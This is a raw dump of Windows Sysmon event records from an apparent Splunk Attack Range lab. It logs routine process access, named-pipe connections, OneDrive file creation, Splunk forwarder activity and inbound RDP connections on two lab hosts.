14:58:12.935{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000078902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.935{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000078901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.935{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fc6e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.935{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3fbe5|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050501Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:13.509{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA058BD05C9C3425127F163336866F46,SHA256=DAF4A60058E64308F049462A11A15307CBD6B08488D762FFBA2BDA886C6D8CA9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050500Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:10.406{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51528-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050499Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:13.134{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E88E19B023029EC8C121C06EA72F1D2,SHA256=8FAC34A71BA1525384948DD85AEF6AB6D631EF0411D2C61C1F50011DE8D2B2B1,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000079062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.888{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.888{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.888{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.888{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.888{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.888{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000079055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:58:14.857{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDriveStandaloneUpdater.exe2021-04-20 14:58:14.842 18141800x800000000000000079054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.701{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000079044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:14.638{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:14.638{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:14.638{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 18141800x800000000000000079041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.638{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000079040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:14.638{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 18141800x800000000000000079039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.638{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000079038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:14.623{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\imageformats\qjpeg.dll2021-04-20 14:58:14.545 18141800x800000000000000079037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.623{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 354300x800000000000000079036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.519{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-11765-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 18141800x800000000000000079035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.513{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.513{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 354300x800000000000000079030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.289{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57551-false10.0.1.12-8000- 18141800x800000000000000079029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000079027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:14.342{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Qt5WinExtras.dll2021-04-20 14:58:14.342 18141800x800000000000000079026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:14.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 354300x800000000000000050503Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:11.850{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52533-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000050502Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:14.524{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A18F6988E2FD16F0B8903B0D669D3E7,SHA256=D2404758560E57EA48C768FFADDADAAFB216BAB4D2B6C602D7D766DB8DE19FED,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000079164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:15.888{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Qt5DBus.dll2021-04-20 14:58:15.888 18141800x800000000000000079163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.888{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 